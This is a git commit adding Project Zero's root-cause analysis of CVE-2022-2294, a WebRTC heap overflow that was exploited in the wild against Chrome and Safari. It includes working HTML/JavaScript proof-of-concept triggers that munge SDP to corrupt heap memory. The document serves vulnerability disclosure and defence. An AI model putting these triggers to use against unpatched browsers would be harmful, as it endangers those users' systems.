STRLCPY/0days-in-the-wild

Add CVE-2022-2294 RCA, authored by Natalie.

Change-Id: Ie40cb5eae68f0049907b621a8b3a62be2526e23c

Maddie Stone committed 2 years ago

64487e83

1 parent 8c8878c0

Total 1 files

■ ■ ■ ■ ■ ■

0day-RCAs/2022/CVE-2022-2294.md

1	+	# CVE-2022-2294: Heap buffer overflow in WebRTC
2	+	Natalie Silvanovich, Project Zero
3	+
4	+	## The Basics
5	+
6	+	Disclosure or Patch Date: July 4, 2022
7	+
8	+	Product: WebRTC (in-the-wild exploitation targeted Chrome)
9	+
10	+	Advisory:
11	+
12	+	* Chrome: https://chromereleases.googleblog.com/2022/07/stable-channel-update-for-desktop.html
13	+	* Safari: https://support.apple.com/en-us/HT213341
14	+
15	+	Affected Versions:
16	+
17	+	* WebRTC July 1, 2022 or earlier (WebRTC does not have formal versioning)
18	+	* Chrome pre-103.0.5060.114 and earlier
19	+	* Safari 15.5 and earlier
20	+	* This issue does not affect Firefox
21	+
22	+	The vulnerable library is also used by many mobile applications, but it is unclear whether the issue is exploitable. The bug is also only reachable in applications that use SDP munging or allow users to manipulate the SDP API. However, since SDP munging is fairly common, and use of the feature is typically not considered a security boundary by applications, we strongly recommend that all WebRTC users update their library to the most recent version.
23	+
24	+	First Patched Version:
25	+
26	+	* Chrome: 103.0.5060.114
27	+	* Safari: 15.6
28	+
29	+	Issue/Bug Report: https://bugs.chromium.org/p/chromium/issues/detail?id=1341043
30	+
31	+	Patch CL:
32	+
33	+	Both patches must be applied to fully remediate this issue:
34	+
35	+	* https://webrtc-review.googlesource.com/c/src/+/267281
36	+	* https://webrtc-review.googlesource.com/c/src/+/267628
37	+
38	+	Bug-Introducing CL: https://webrtc-review.googlesource.com/c/src/+/95488/
39	+
40	+	Reporter(s): Jan Vojtesek from the Avast Threat Intelligence
41	+
42	+	## The Code
43	+
44	+	Proof-of-concept:
45	+
46	+	Chrome:
47	+	```html
48	+	<html>
49	+	<head>
50	+	<script>
51	+
52	+	var canvas = document.createElement('canvas');
53	+
54	+	function createConnection() {
55	+	var pc = new RTCPeerConnection({
56	+	iceServers: [],
57	+	iceTransportPolicy: 'relay'
58	+	});
59	+
60	+	var encodings = [];
61	+	for (var i = 0; i < 2; i++) {
62	+	encodings.push({ rid: String.fromCharCode(97 + i) });// rid must be alphabetic and unique
63	+	}
64	+	pc.addTransceiver(canvas.captureStream(0).getTracks()[0], { sendEncodings: encodings });
65	+	return pc;
66	+	}
67	+
68	+
69	+	function sdp_munge(offer) {
70	+	let sdp = offer.sdp;
71	+	sdp = sdp.replace(/\r?\na=rid:(.+)\s+send\r?\na=simulcast:send\s+.+;\1/, '');
72	+	offer.sdp = sdp;
73	+	return offer;
74	+	}
75	+
76	+
77	+	async function trigger(pc) {
78	+	var pc = createConnection(); // create an WebRTC connection with
79	+	var offer = await pc.createOffer(); // create an offer
80	+	var munged_offer = sdp_munge(offer); // remove one of the send_codecs_ from the offer
81	+	await pc.setLocalDescription(munged_offer); // set the local description with the sdp
82	+	}
83	+
84	+
85	+	trigger();
86	+
87	+
88	+	</script>
89	+	</head>
90	+	</html>
91	+	```
92	+
93	+	Safari:
94	+	Note that creating canvases for WebRTC with `document.createElement` is not supported in Safari. The PoC is otherwise the same.
95	+	```html
96	+	<html>
97	+	<body><canvas id="myCanvas" width="200" height="100"></canvas>
98	+	<script>
99	+
100	+	var canvas = document.getElementById('myCanvas');
101	+
102	+	function createConnection() {
103	+	var pc = new RTCPeerConnection({
104	+	iceServers: [],
105	+	iceTransportPolicy: 'relay'
106	+	});
107	+
108	+	var encodings = [];
109	+	for (var i = 0; i < 2; i++) {
110	+	encodings.push({ rid: String.fromCharCode(97 + i) });
111	+	}
112	+	var c = canvas.getContext("bitmaprenderer");
113	+	console.log("test", canvas.captureStream());
114	+	pc.addTransceiver(canvas.captureStream(0).getTracks()[0], { sendEncodings: encodings });
115	+	return pc;
116	+	}
117	+
118	+	function sdp_munge(offer) {
119	+	let sdp = offer.sdp;
120	+	sdp = sdp.replace(/\r?\na=rid:(.+)\s+send\r?\na=simulcast:send\s+.+;\1/, '');
121	+	offer.sdp = sdp;
122	+	return offer;
123	+	}
124	+
125	+	async function trigger(pc) {
126	+	var pc = createConnection(); // create an WebRTC connection with
127	+	var offer = await pc.createOffer(); // create an offer
128	+	var munged_offer = sdp_munge(offer); // remove one of the send_codecs_ from the offer
129	+	await pc.setLocalDescription(munged_offer); // set the local description with the sdp
130	+	}
131	+
132	+
133	+	trigger();
134	+
135	+
136	+	</script>
137	+	</body>
138	+	</html>
139	+	```
140	+
141	+	Exploit sample: N/A
142	+
143	+	Access to the exploit sample? Yes
144	+
145	+	## The Vulnerability
146	+
147	+	Bug class: Heap buffer overflow
148	+
149	+	Vulnerability details:
150	+
151	+	When a LocalConnection is created in WebRTC, it creates a vector that contains supported encodings. If the supported encodings are changed due to munging, a second vector is created with the current encodings. These vectors are then reconciled, which involves copying encoding properties between the vectors. If one is shorter than the other, due to the number of encodings supported being changed, a vector will be written out of bounds.
152	+
153	+	While removing an encoding was technically supported by the WebRTC API, it is uncommon for a real application to munge a local connection as opposed to the SDP sent to a remote one. The fix to this issue causes an error if an application attempts this.
154	+
155	+	Patch analysis:
156	+
157	+	Thoughts on how this vuln might have been found _(fuzzing, code auditing, variant analysis, etc.)_:
158	+
159	+	Most likely code review, possibly involving analysis of past bugs, as [CVE-2021-4079](https://bugs.chromium.org/p/chromium/issues/detail?id=1265806) is somewhat similar. It is unlikely that this bug was found in an automated fashion.
160	+
161	+	(Historical/present/future) context of bug:
162	+
163	+	## The Exploit
164	+
165	+	(The terms exploit primitive, exploit strategy, exploit technique, and exploit flow are [defined here](https://googleprojectzero.blogspot.com/2020/06/a-survey-of-recent-ios-kernel-exploits.html).)
166	+
167	+	Exploit strategy (or strategies):
168	+
169	+	Exploit flow:
170	+
171	+	Known cases of the same exploit flow:
172	+
173	+	Part of an exploit chain?
174	+
175	+	## The Next Steps
176	+
177	+	### Variant analysis
178	+
179	+	Areas/approach for variant analysis (and why):
180	+
181	+	Found variants:
182	+
183	+	### Structural improvements
184	+
185	+	What are structural improvements such as ways to kill the bug class, prevent the introduction of this vulnerability, mitigate the exploit flow, make this type of vulnerability harder to exploit, etc.?
186	+
187	+	Ideas to kill the bug class:
188	+
189	+	Ideas to mitigate the exploit flow:
190	+
191	+	Other potential improvements:
192	+
193	+	SDP munging in JavaScript is not supported by the WebRTC specification, so removing browser support is a possibility, though practically, it is widely used across the web.
194	+
195	+	### 0-day detection methods
196	+
197	+	What are potential detection methods for similar 0-days? Meaning are there any ideas of how this exploit or similar exploits could be detected as a 0-day?
198	+
199	+	## Other References
200	+	* ["The Return of Candiru: Zero-days in the Middle East"](https://decoded.avast.io/janvojtesek/the-return-of-candiru-zero-days-in-the-middle-east/) by Avast
201	+